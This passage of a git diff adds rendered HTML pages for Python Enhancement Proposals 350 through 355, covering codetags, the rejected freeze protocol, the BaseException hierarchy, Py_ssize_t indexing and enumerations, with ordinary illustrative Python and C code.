Not really, unless fields are abused. If an item exists in +the tracker, a simple ticket number in the codetag tracker field +is sufficient. Maybe a duplicated title would be acceptable. +Furthermore, it’s too burdensome to have a ticket filed for every +item that pops into a developer’s mind on-the-go. Additionally, +the tracking system could possibly be obviated for simple or small +projects that can reasonably fit the relevant data into a codetag.
+
+
+
+
Objection:
+
Codetags are ugly and clutter code.
+
Defense:
+
That is a good point. But I’d still rather have such info +in a single place (the source code) than various other documents, +likely getting duplicated or forgotten about. The completed +codetags can be sent off to the DONE File, or to the bit +bucket.
+
+
+
+
Objection:
+
Codetags (and all comments) get out of date.
+
Defense:
+
Not so much if other sources (externally visible +documentation) depend on their being accurate.
+
+
+
+
Objection:
+
Codetags tend to only rarely have estimated completion +dates of any sort. OK, the fields are optional, but you want to +suggest fields that actually will be widely used.
+
Defense:
+
If an item is inestimable don’t bother with specifying a +date field. Using tools to display items with order and/or color +by due date and/or priority, it is easier to make estimates. +Having your roadmap be a dynamic reflection of your codetags makes +you much more likely to keep the codetags accurate.
+
+
+
+
Objection:
+
Named variables for the field parameters in the <> +should be used instead of cryptic one-character prefixes. I.e., +<MDE p:3> should rather be <author=MDE, priority=3>.
+
Defense:
+
It is just too much typing/verbosity to spell out fields. I +argue that p:3 i:2 is as readable as priority=3, +iteration=2 and is much more likely to by typed and remembered +(see bullet C in Philosophy). In this case practicality beats +purity. There are not many fields to keep track of so one letter +prefixes are suitable.
+
+
+
+
Objection:
+
Synonyms should be deprecated since it is better to have a +single way to spell something.
+
Defense:
+
Many programmers prefer short mnemonic names, especially in +comments. This is why short mnemonics were chosen as the primary +names. However, others feel that an explicit spelling is less +confusing and less prone to error. There will always be two camps +on this subject. Thus synonyms (and complete, full spellings) +should remain supported.
+
+
+
+
Objection:
+
It is cruel to use [for mnemonics] opaque acronyms and +abbreviations which drop vowels; it’s hard to figure these things +out. On that basis I hate: MLSTN RFCTR RFE FEETCH, NYI, FR, FTRQ, +FTR WKRD RVDBY
+
Defense:
+
Mnemonics are preferred since they are pretty easy to +remember and take up less space. If programmers didn’t like +dropping vowels we would be able to fit very little code on a +line. The space is important for those who write comments that +often fit on a single line. But when using a canon everywhere it +is much less likely to get something to fit on a line.
+
+
+
+
Objection:
+
It takes too long to type the fields.
+
Defense:
+
Then don’t use (most or any of) them, especially if you’re +the only programmer. Terminating a codetag with <> is a small +chore, and in doing so you enable the use of the proposed tools. +Editor auto-completion of codetags is also useful: You can +program your editor to stamp a template (e.g. # FIXME . <MDE +{date}>) with just a keystroke or two.
+
+
+
+
Objection:
+
WorkWeek is an obscure and uncommon time unit.
+
Defense:
+
That’s true but it is a highly suitable unit of granularity +for estimation/targeting purposes, and it is very compact. The +ISO 8601 is widely understood but allows you to only specify +either a specific day (restrictive) or month (broad).
+
+
+
+
Objection:
+
I aesthetically dislike for the comment to be terminated +with <> in the empty field case.
+
Defense:
+
It is necessary to have a terminator since codetags may be +followed by non-codetag comments. Or codetags could be limited to +a single line, but that’s prohibitive. I can’t think of any +single-character terminator that is appropriate and significantly +better than <>. Maybe @ could be a terminator, but then most +codetags will have an unnecessary @.
+
+
+
+
Objection:
+
I can’t use codetags when writing HTML, or less +specifically, XML. Maybe @fields@ would be a better than +<fields> as the delimiters.
+
Defense:
+
Maybe you’re right, but <> looks nicer whenever +applicable. XML/SGML could use @ while more common +programming languages stick to <>.
+
+
+
+

References

+

Some other tools have approached defining/exploiting codetags. +See http://tracos.org/codetag/wiki/Links.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0350.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0351/index.html b/pep-0351/index.html new file mode 100644 index 00000000000..e36487b8193 --- /dev/null +++ b/pep-0351/index.html @@ -0,0 +1,274 @@ + + + + + + + + PEP 351 – The freeze protocol | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 351 – The freeze protocol

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
14-Apr-2005
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes a simple protocol for requesting a frozen, +immutable copy of a mutable object. It also defines a new built-in +function which uses this protocol to provide an immutable copy on any +cooperating object.

+
+
+

Rejection Notice

+

This PEP was rejected. For a rationale, see this thread on python-dev.

+
+
+

Rationale

+

Built-in objects such dictionaries and sets accept only immutable +objects as keys. This means that mutable objects like lists cannot be +used as keys to a dictionary. However, a Python programmer can +convert a list to a tuple; the two objects are similar, but the latter +is immutable, and can be used as a dictionary key.

+

It is conceivable that third party objects also have similar mutable +and immutable counterparts, and it would be useful to have a standard +protocol for conversion of such objects.

+

sets.Set objects expose a “protocol for automatic conversion to +immutable” so that you can create sets.Sets of sets.Sets. PEP 218 +deliberately dropped this feature from built-in sets. This PEP +advances that the feature is still useful and proposes a standard +mechanism for its support.

+
+
+

Proposal

+

It is proposed that a new built-in function called freeze() is added.

+

If freeze() is passed an immutable object, as determined by hash() on +that object not raising a TypeError, then the object is returned +directly.

+

If freeze() is passed a mutable object (i.e. hash() of that object +raises a TypeError), then freeze() will call that object’s +__freeze__() method to get an immutable copy. If the object does not +have a __freeze__() method, then a TypeError is raised.

+
+
+

Sample implementations

+

Here is a Python implementation of the freeze() built-in:

+
def freeze(obj):
+    try:
+        hash(obj)
+        return obj
+    except TypeError:
+        freezer = getattr(obj, '__freeze__', None)
+        if freezer:
+            return freezer()
+        raise TypeError('object is not freezable')``
+
+
+

Here are some code samples which show the intended semantics:

+
class xset(set):
+    def __freeze__(self):
+        return frozenset(self)
+
+class xlist(list):
+    def __freeze__(self):
+        return tuple(self)
+
+class imdict(dict):
+    def __hash__(self):
+        return id(self)
+
+    def _immutable(self, *args, **kws):
+        raise TypeError('object is immutable')
+
+    __setitem__ = _immutable
+    __delitem__ = _immutable
+    clear       = _immutable
+    update      = _immutable
+    setdefault  = _immutable
+    pop         = _immutable
+    popitem     = _immutable
+
+class xdict(dict):
+    def __freeze__(self):
+        return imdict(self)
+
+>>> s = set([1, 2, 3])
+>>> {s: 4}
+Traceback (most recent call last):
+  File "<stdin>", line 1, in ?
+TypeError: set objects are unhashable
+>>> t = freeze(s)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in ?
+  File "/usr/tmp/python-lWCjBK.py", line 9, in freeze
+TypeError: object is not freezable
+>>> t = xset(s)
+>>> u = freeze(t)
+>>> {u: 4}
+{frozenset([1, 2, 3]): 4}
+>>> x = 'hello'
+>>> freeze(x) is x
+True
+>>> d = xdict(a=7, b=8, c=9)
+>>> hash(d)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in ?
+TypeError: dict objects are unhashable
+>>> hash(freeze(d))
+-1210776116
+>>> {d: 4}
+Traceback (most recent call last):
+  File "<stdin>", line 1, in ?
+TypeError: dict objects are unhashable
+>>> {freeze(d): 4}
+{{'a': 7, 'c': 9, 'b': 8}: 4}
+
+
+
+
+

Reference implementation

+

Patch 1335812 provides the C implementation of this feature. It adds the +freeze() built-in, along with implementations of the __freeze__() +method for lists and sets. Dictionaries are not easily freezable in +current Python, so an implementation of dict.__freeze__() is not +provided yet.

+
+
+

Open issues

+
    +
  • Should we define a similar protocol for thawing frozen objects?
  • +
  • Should dicts and sets automatically freeze their mutable keys?
  • +
  • Should we support “temporary freezing” (perhaps with a method called +__congeal__()) a la __as_temporarily_immutable__() in sets.Set?
  • +
  • For backward compatibility with sets.Set, should we support +__as_immutable__()? Or should __freeze__() just be renamed to +__as_immutable__()?
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0351.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0352/index.html b/pep-0352/index.html new file mode 100644 index 00000000000..60eadc8314c --- /dev/null +++ b/pep-0352/index.html @@ -0,0 +1,390 @@ + + + + + + + + PEP 352 – Required Superclass for Exceptions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 352 – Required Superclass for Exceptions

+
+
Author:
+
Brett Cannon, Guido van Rossum
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
27-Oct-2005
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

In Python 2.4 and before, any (classic) class can be raised as an +exception. The plan for 2.5 was to allow new-style classes, but this +makes the problem worse – it would mean any class (or +instance) can be raised! This is a problem as it prevents any +guarantees from being made about the interface of exceptions. +This PEP proposes introducing a new superclass that all raised objects +must inherit from. Imposing the restriction will allow a standard +interface for exceptions to exist that can be relied upon. It also +leads to a known hierarchy for all exceptions to adhere to.

+

One might counter that requiring a specific base class for a +particular interface is unPythonic. However, in the specific case of +exceptions there’s a good reason (which has generally been agreed to +on python-dev): requiring hierarchy helps code that wants to catch +exceptions by making it possible to catch all exceptions explicitly +by writing except BaseException: instead of +except *:. [1]

+

Introducing a new superclass for exceptions also gives us the chance +to rearrange the exception hierarchy slightly for the better. As it +currently stands, all exceptions in the built-in namespace inherit +from Exception. This is a problem since this includes two exceptions +(KeyboardInterrupt and SystemExit) that often need to be excepted from +the application’s exception handling: the default behavior of shutting +the interpreter down without a traceback is usually more desirable than +whatever the application might do (with the possible exception of +applications that emulate Python’s interactive command loop with +>>> prompt). Changing it so that these two exceptions inherit +from the common superclass instead of Exception will make it easy for +people to write except clauses that are not overreaching and not +catch exceptions that should propagate up.

+

This PEP is based on previous work done for PEP 348.

+
+
+

Requiring a Common Superclass

+

This PEP proposes introducing a new exception named BaseException that +is a new-style class and has a single attribute, args. Below +is the code as the exception will work in Python 3.0 (how it will +work in Python 2.x is covered in the Transition Plan section):

+
class BaseException(object):
+
+    """Superclass representing the base of the exception hierarchy.
+
+    Provides an 'args' attribute that contains all arguments passed
+    to the constructor.  Suggested practice, though, is that only a
+    single string argument be passed to the constructor.
+
+    """
+
+    def __init__(self, *args):
+        self.args = args
+
+    def __str__(self):
+        if len(self.args) == 1:
+            return str(self.args[0])
+        else:
+            return str(self.args)
+
+    def __repr__(self):
+        return "%s(*%s)" % (self.__class__.__name__, repr(self.args))
+
+
+

No restriction is placed upon what may be passed in for args +for backwards-compatibility reasons. In practice, though, only +a single string argument should be used. This keeps the string +representation of the exception to be a useful message about the +exception that is human-readable; this is why the __str__ method +special-cases on length-1 args value. Including programmatic +information (e.g., an error code number) should be stored as a +separate attribute in a subclass.

+

The raise statement will be changed to require that any object +passed to it must inherit from BaseException. This will make sure +that all exceptions fall within a single hierarchy that is anchored at +BaseException [1]. This also guarantees a basic +interface that is inherited from BaseException. The change to +raise will be enforced starting in Python 3.0 (see the Transition +Plan below).

+

With BaseException being the root of the exception hierarchy, +Exception will now inherit from it.

+
+
+

Exception Hierarchy Changes

+

With the exception hierarchy now even more important since it has a +basic root, a change to the existing hierarchy is called for. As it +stands now, if one wants to catch all exceptions that signal an error +and do not mean the interpreter should be allowed to exit, you must +specify all but two exceptions specifically in an except clause +or catch the two exceptions separately and then re-raise them and +have all other exceptions fall through to a bare except clause:

+
except (KeyboardInterrupt, SystemExit):
+    raise
+except:
+    ...
+
+
+

That is needlessly explicit. This PEP proposes moving +KeyboardInterrupt and SystemExit to inherit directly from +BaseException.

+
- BaseException
+  |- KeyboardInterrupt
+  |- SystemExit
+  |- Exception
+     |- (all other current built-in exceptions)
+
+
+

Doing this makes catching Exception more reasonable. It would catch +only exceptions that signify errors. Exceptions that signal that the +interpreter should exit will not be caught and thus be allowed to +propagate up and allow the interpreter to terminate.

+

KeyboardInterrupt has been moved since users typically expect an +application to exit when they press the interrupt key (usually Ctrl-C). +If people have overly broad except clauses the expected behaviour +does not occur.

+

SystemExit has been moved for similar reasons. Since the exception is +raised when sys.exit() is called the interpreter should normally +be allowed to terminate. Unfortunately overly broad except +clauses can prevent the explicitly requested exit from occurring.

+

To make sure that people catch Exception most of the time, various +parts of the documentation and tutorials will need to be updated to +strongly suggest that Exception be what programmers want to use. Bare +except clauses or catching BaseException directly should be +discouraged based on the fact that KeyboardInterrupt and SystemExit +almost always should be allowed to propagate up.

+
+
+

Transition Plan

+

Since semantic changes to Python are being proposed, a transition plan +is needed. The goal is to end up with the new semantics being used in +Python 3.0 while providing a smooth transition for 2.x code. All +deprecations mentioned in the plan will lead to the removal of the +semantics starting in the version following the initial deprecation.

+

Here is BaseException as implemented in the 2.x series:

+
class BaseException(object):
+
+    """Superclass representing the base of the exception hierarchy.
+
+    The __getitem__ method is provided for backwards-compatibility
+    and will be deprecated at some point.  The 'message' attribute
+    is also deprecated.
+
+    """
+
+    def __init__(self, *args):
+        self.args = args
+
+    def __str__(self):
+        return str(self.args[0]
+                   if len(self.args) <= 1
+                   else self.args)
+
+    def __repr__(self):
+        func_args = repr(self.args) if self.args else "()"
+        return self.__class__.__name__ + func_args
+
+    def __getitem__(self, index):
+        """Index into arguments passed in during instantiation.
+
+        Provided for backwards-compatibility and will be
+        deprecated.
+
+        """
+        return self.args[index]
+
+    def _get_message(self):
+        """Method for 'message' property."""
+        warnings.warn("the 'message' attribute has been deprecated "
+                        "since Python 2.6")
+        return self.args[0] if len(args) == 1 else ''
+
+    message = property(_get_message,
+                        doc="access the 'message' attribute; "
+                            "deprecated and provided only for "
+                            "backwards-compatibility")
+
+
+

Deprecation of features in Python 2.9 is optional. This is because it +is not known at this time if Python 2.9 (which is slated to be the +last version in the 2.x series) will actively deprecate features that +will not be in 3.0. It is conceivable that no deprecation warnings +will be used in 2.9 since there could be such a difference between 2.9 +and 3.0 that it would make 2.9 too “noisy” in terms of warnings. Thus +the proposed deprecation warnings for Python 2.9 will be revisited +when development of that version begins, to determine if they are still +desired.

+
    +
  • Python 2.5 [done]
      +
    • all standard exceptions become new-style classes [done]
    • +
    • introduce BaseException [done]
    • +
    • Exception, KeyboardInterrupt, and SystemExit inherit from +BaseException [done]
    • +
    • deprecate raising string exceptions [done]
    • +
    +
  • +
  • Python 2.6 [done]
      +
    • deprecate catching string exceptions [done]
    • +
    • deprecate message attribute (see Retracted Ideas) [done]
    • +
    +
  • +
  • Python 2.7 [done]
      +
    • deprecate raising exceptions that do not inherit from BaseException
    • +
    +
  • +
  • Python 3.0 [done]
      +
    • drop everything that was deprecated above:
        +
      • string exceptions (both raising and catching) [done]
      • +
      • all exceptions must inherit from BaseException [done]
      • +
      • drop __getitem__, message [done]
      • +
      +
    • +
    +
  • +
+
+
+

Retracted Ideas

+

A previous version of this PEP that was implemented in Python 2.5 +included a ‘message’ attribute on BaseException. Its purpose was to +begin a transition to BaseException accepting only a single argument. +This was to tighten the interface and to force people to use +attributes in subclasses to carry arbitrary information with an +exception instead of cramming it all into args.

+

Unfortunately, while implementing the removal of the args +attribute in Python 3.0 at the PyCon 2007 sprint +[2], it was discovered that the transition was +very painful, especially for C extension modules. It was decided that +it would be better to deprecate the message attribute in +Python 2.6 (and remove it in Python 2.7 and Python 3.0) and consider a +more long-term transition strategy in Python 3.0 to remove +multiple-argument support in BaseException in preference of accepting +only a single argument. Thus the introduction of message and the +original deprecation of args has been retracted.

+
+
+

References

+ + +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0352.rst

+

Last modified: 2024-12-03 18:09:24 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0353/index.html b/pep-0353/index.html new file mode 100644 index 00000000000..031e6094f17 --- /dev/null +++ b/pep-0353/index.html @@ -0,0 +1,368 @@ + + + + + + + + PEP 353 – Using ssize_t as the index type | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 353 – Using ssize_t as the index type

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
18-Dec-2005
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

In Python 2.4, indices of sequences are restricted to the C type +int. On 64-bit machines, sequences therefore cannot use the full +address space, and are restricted to 2**31 elements. This PEP proposes +to change this, introducing a platform-specific index type +Py_ssize_t. An implementation of the proposed change is in +http://svn.python.org/projects/python/branches/ssize_t.

+
+
+

Rationale

+

64-bit machines are becoming more popular, and the size of main memory +increases beyond 4GiB. On such machines, Python currently is limited, +in that sequences (strings, unicode objects, tuples, lists, +array.arrays, …) cannot contain more than 2GiElements.

+

Today, very few machines have memory to represent larger lists: as +each pointer is 8B (in a 64-bit machine), one needs 16GiB to just hold +the pointers of such a list; with data in the list, the memory +consumption grows even more. However, there are three container types +for which users request improvements today:

+
    +
  • strings (currently restricted to 2GiB)
  • +
  • mmap objects (likewise; plus the system typically +won’t keep the whole object in memory concurrently)
  • +
  • Numarray objects (from Numerical Python)
  • +
+

As the proposed change will cause incompatibilities on 64-bit +machines, it should be carried out while such machines are not in wide +use (IOW, as early as possible).

+
+
+

Specification

+

A new type Py_ssize_t is introduced, which has the same size as the +compiler’s size_t type, but is signed. It will be a typedef for +ssize_t where available.

+

The internal representation of the length fields of all container +types is changed from int to ssize_t, for all types included in the +standard distribution. In particular, PyObject_VAR_HEAD is changed to +use Py_ssize_t, affecting all extension modules that use that macro.

+

All occurrences of index and length parameters and results are changed +to use Py_ssize_t, including the sequence slots in type objects, and +the buffer interface.

+

New conversion functions PyInt_FromSsize_t and PyInt_AsSsize_t, are +introduced. PyInt_FromSsize_t will transparently return a long int +object if the value exceeds the LONG_MAX; PyInt_AsSsize_t will +transparently process long int objects.

+

New function pointer typedefs ssizeargfunc, ssizessizeargfunc, +ssizeobjargproc, ssizessizeobjargproc, and lenfunc are introduced. The +buffer interface function types are now called readbufferproc, +writebufferproc, segcountproc, and charbufferproc.

+

A new conversion code ‘n’ is introduced for PyArg_ParseTuple +Py_BuildValue, PyObject_CallFunction and PyObject_CallMethod. +This code operates on Py_ssize_t.

+

The conversion codes ‘s#’ and ‘t#’ will output Py_ssize_t +if the macro PY_SSIZE_T_CLEAN is defined before Python.h +is included, and continue to output int if that macro +isn’t defined.

+

At places where a conversion from size_t/Py_ssize_t to +int is necessary, the strategy for conversion is chosen +on a case-by-case basis (see next section).

+

To prevent loading extension modules that assume a 32-bit +size type into an interpreter that has a 64-bit size type, +Py_InitModule4 is renamed to Py_InitModule4_64.

+
+
+

Conversion guidelines

+

Module authors have the choice whether they support this PEP in their +code or not; if they support it, they have the choice of different +levels of compatibility.

+

If a module is not converted to support this PEP, it will continue to +work unmodified on a 32-bit system. On a 64-bit system, compile-time +errors and warnings might be issued, and the module might crash the +interpreter if the warnings are ignored.

+

Conversion of a module can either attempt to continue using int +indices, or use Py_ssize_t indices throughout.

+

If the module should continue to use int indices, care must be taken +when calling functions that return Py_ssize_t or size_t, in +particular, for functions that return the length of an object (this +includes the strlen function and the sizeof operator). A good compiler +will warn when a Py_ssize_t/size_t value is truncated into an int. +In these cases, three strategies are available:

+
    +
  • statically determine that the size can never exceed an int +(e.g. when taking the sizeof a struct, or the strlen of +a file pathname). In this case, write:
    some_int = Py_SAFE_DOWNCAST(some_value, Py_ssize_t, int);
    +
    +
    +

    This will add an assertion in debug mode that the value +really fits into an int, and just add a cast otherwise.

    +
  • +
  • statically determine that the value shouldn’t overflow an +int unless there is a bug in the C code somewhere. Test +whether the value is smaller than INT_MAX, and raise an +InternalError if it isn’t.
  • +
  • otherwise, check whether the value fits an int, and raise +a ValueError if it doesn’t.
  • +
+

The same care must be taken for tp_as_sequence slots, in +addition, the signatures of these slots change, and the +slots must be explicitly recast (e.g. from intargfunc +to ssizeargfunc). Compatibility with previous Python +versions can be achieved with the test:

+
#if PY_VERSION_HEX < 0x02050000 && !defined(PY_SSIZE_T_MIN)
+typedef int Py_ssize_t;
+#define PY_SSIZE_T_MAX INT_MAX
+#define PY_SSIZE_T_MIN INT_MIN
+#endif
+
+
+

and then using Py_ssize_t in the rest of the code. For +the tp_as_sequence slots, additional typedefs might +be necessary; alternatively, by replacing:

+
PyObject* foo_item(struct MyType* obj, int index)
+{
+  ...
+}
+
+
+

with:

+
PyObject* foo_item(PyObject* _obj, Py_ssize_t index)
+{
+   struct MyType* obj = (struct MyType*)_obj;
+   ...
+}
+
+
+

it becomes possible to drop the cast entirely; the type +of foo_item should then match the sq_item slot in all +Python versions.

+

If the module should be extended to use Py_ssize_t indices, all usages +of the type int should be reviewed, to see whether it should be +changed to Py_ssize_t. The compiler will help in finding the spots, +but a manual review is still necessary.

+

Particular care must be taken for PyArg_ParseTuple calls: +they need all be checked for s# and t# converters, and +PY_SSIZE_T_CLEAN must be defined before including Python.h +if the calls have been updated accordingly.

+

Fredrik Lundh has written a scanner which checks the code +of a C module for usage of APIs whose signature has changed.

+
+
+

Discussion

+
+

Why not size_t

+

An initial attempt to implement this feature tried to use +size_t. It quickly turned out that this cannot work: Python +uses negative indices in many places (to indicate counting +from the end). Even in places where size_t would be usable, +too many reformulations of code where necessary, e.g. in +loops like:

+
for(index = length-1; index >= 0; index--)
+
+
+

This loop will never terminate if index is changed from +int to size_t.

+
+
+

Why not Py_intptr_t

+

Conceptually, Py_intptr_t and Py_ssize_t are different things: +Py_intptr_t needs to be the same size as void*, and Py_ssize_t +the same size as size_t. These could differ, e.g. on machines +where pointers have segment and offset. On current flat-address +space machines, there is no difference, so for all practical +purposes, Py_intptr_t would have worked as well.

+
+
+

Doesn’t this break much code?

+

With the changes proposed, code breakage is fairly +minimal. On a 32-bit system, no code will break, as +Py_ssize_t is just a typedef for int.

+

On a 64-bit system, the compiler will warn in many +places. If these warnings are ignored, the code will +continue to work as long as the container sizes don’t +exceed 2**31, i.e. it will work nearly as good as +it does currently. There are two exceptions to this +statement: if the extension module implements the +sequence protocol, it must be updated, or the calling +conventions will be wrong. The other exception is +the places where Py_ssize_t is output through a +pointer (rather than a return value); this applies +most notably to codecs and slice objects.

+

If the conversion of the code is made, the same code +can continue to work on earlier Python releases.

+
+
+

Doesn’t this consume too much memory?

+

One might think that using Py_ssize_t in all tuples, +strings, lists, etc. is a waste of space. This is +not true, though: on a 32-bit machine, there is no +change. On a 64-bit machine, the size of many +containers doesn’t change, e.g.

+
    +
  • in lists and tuples, a pointer immediately follows +the ob_size member. This means that the compiler +currently inserts a 4 padding bytes; with the +change, these padding bytes become part of the size.
  • +
  • in strings, the ob_shash field follows ob_size. +This field is of type long, which is a 64-bit +type on most 64-bit systems (except Win64), so +the compiler inserts padding before it as well.
  • +
+
+
+
+

Open Issues

+
    +
  • Marc-Andre Lemburg commented that complete backwards +compatibility with existing source code should be +preserved. In particular, functions that have +Py_ssize_t* output arguments should continue to run +correctly even if the callers pass int*.

    It is not clear what strategy could be used to implement +that requirement.

    +
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0353.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0354/index.html b/pep-0354/index.html new file mode 100644 index 00000000000..16def600a40 --- /dev/null +++ b/pep-0354/index.html @@ -0,0 +1,363 @@ + + + + + + + + PEP 354 – Enumerations in Python | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 354 – Enumerations in Python

+
+
Author:
+
Ben Finney <ben+python at benfinney.id.au>
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Created:
+
20-Dec-2005
+
Python-Version:
+
2.6
+
Post-History:
+
20-Dec-2005
+
Superseded-By:
+
435
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP has been rejected. This doesn’t slot nicely into any of the +existing modules (like collections), and the Python standard library +eschews having lots of individual data structures in their own +modules. Also, the PEP has generated no widespread interest. For +those who need enumerations, there are cookbook recipes and PyPI +packages that meet these needs.

+

Note: this PEP was superseded by PEP 435, which has been accepted in +May 2013.

+
+
+

Abstract

+

This PEP specifies an enumeration data type for Python.

+

An enumeration is an exclusive set of symbolic names bound to +arbitrary unique values. Values within an enumeration can be iterated +and compared, but the values have no inherent relationship to values +outside the enumeration.

+
+
+

Motivation

+

The properties of an enumeration are useful for defining an immutable, +related set of constant values that have a defined sequence but no +inherent semantic meaning. Classic examples are days of the week +(Sunday through Saturday) and school assessment grades (‘A’ through +‘D’, and ‘F’). Other examples include error status values and states +within a defined process.

+

It is possible to simply define a sequence of values of some other +basic type, such as int or str, to represent discrete +arbitrary values. However, an enumeration ensures that such values +are distinct from any others, and that operations without meaning +(“Wednesday times two”) are not defined for these values.

+
+
+

Specification

+

An enumerated type is created from a sequence of arguments to the +type’s constructor:

+
>>> Weekdays = enum('sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat')
+>>> Grades = enum('A', 'B', 'C', 'D', 'F')
+
+
+

Enumerations with no values are meaningless. The exception +EnumEmptyError is raised if the constructor is called with no +value arguments.

+

The values are bound to attributes of the new enumeration object:

+
>>> today = Weekdays.mon
+
+
+

The values can be compared:

+
>>> if today == Weekdays.fri:
+...     print "Get ready for the weekend"
+
+
+

Values within an enumeration cannot be meaningfully compared except +with values from the same enumeration. The comparison operation +functions return NotImplemented [1] when a +value from an enumeration is compared against any value not from the +same enumeration or of a different type:

+
>>> gym_night = Weekdays.wed
+>>> gym_night.__cmp__(Weekdays.mon)
+1
+>>> gym_night.__cmp__(Weekdays.wed)
+0
+>>> gym_night.__cmp__(Weekdays.fri)
+-1
+>>> gym_night.__cmp__(23)
+NotImplemented
+>>> gym_night.__cmp__("wed")
+NotImplemented
+>>> gym_night.__cmp__(Grades.B)
+NotImplemented
+
+
+

This allows the operation to succeed, evaluating to a boolean value:

+
>>> gym_night = Weekdays.wed
+>>> gym_night < Weekdays.mon
+False
+>>> gym_night < Weekdays.wed
+False
+>>> gym_night < Weekdays.fri
+True
+>>> gym_night < 23
+False
+>>> gym_night > 23
+True
+>>> gym_night > "wed"
+True
+>>> gym_night > Grades.B
+True
+
+
+

Coercing a value from an enumeration to a str results in the +string that was specified for that value when constructing the +enumeration:

+
>>> gym_night = Weekdays.wed
+>>> str(gym_night)
+'wed'
+
+
+

The sequence index of each value from an enumeration is exported as an +integer via that value’s index attribute:

+
>>> gym_night = Weekdays.wed
+>>> gym_night.index
+3
+
+
+

An enumeration can be iterated, returning its values in the sequence +they were specified when the enumeration was created:

+
>>> print [str(day) for day in Weekdays]
+['sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat']
+
+
+

Values from an enumeration are hashable, and can be used as dict +keys:

+
>>> plans = {}
+>>> plans[Weekdays.sat] = "Feed the horse"
+
+
+

The normal usage of enumerations is to provide a set of possible +values for a data type, which can then be used to map to other +information about the values:

+
>>> for report_grade in Grades:
+...     report_students[report_grade] = \
+...         [s for s in students if students.grade == report_grade]
+
+
+
+
+

Rationale – Other designs considered

+
+

All in one class

+

Some implementations have the enumeration and its values all as +attributes of a single object or class.

+

This PEP specifies a design where the enumeration is a container, and +the values are simple comparables. It was felt that attempting to +place all the properties of enumeration within a single class +complicates the design without apparent benefit.

+
+
+

Metaclass for creating enumeration classes

+

The enumerations specified in this PEP are instances of an enum +type. Some alternative designs implement each enumeration as its own +class, and a metaclass to define common properties of all +enumerations.

+

One motivation for having a class (rather than an instance) for each +enumeration is to allow subclasses of enumerations, extending and +altering an existing enumeration. A class, though, implies that +instances of that class will be created; it is difficult to imagine +what it means to have separate instances of a “days of the week” +class, where each instance contains all days. This usually leads to +having each class follow the Singleton pattern, further complicating +the design.

+

In contrast, this PEP specifies enumerations that are not expected to +be extended or modified. It is, of course, possible to create a new +enumeration from the string values of an existing one, or even +subclass the enum type if desired.

+
+ +
+

Hiding attributes of enumerated values

+

A previous design had the enumerated values hiding as much as possible +about their implementation, to the point of not exporting the string +key and sequence index.

+

The design in this PEP acknowledges that programs will often find it +convenient to know the enumerated value’s enumeration type, sequence +index, and string key specified for the value. These are exported by +the enumerated value as attributes.

+
+
+
+

Implementation

+

This design is based partly on a recipe [2] from the +Python Cookbook.

+

The PyPI package enum [3] provides a Python +implementation of the data types described in this PEP.

+
+
+

References and Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0354.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0355/index.html b/pep-0355/index.html new file mode 100644 index 00000000000..76543f320bb --- /dev/null +++ b/pep-0355/index.html @@ -0,0 +1,796 @@ + + + + + + + + PEP 355 – Path - Object oriented filesystem paths | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 355 – Path - Object oriented filesystem paths

+
+
Author:
+
Björn Lindqvist <bjourne at gmail.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
24-Jan-2006
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

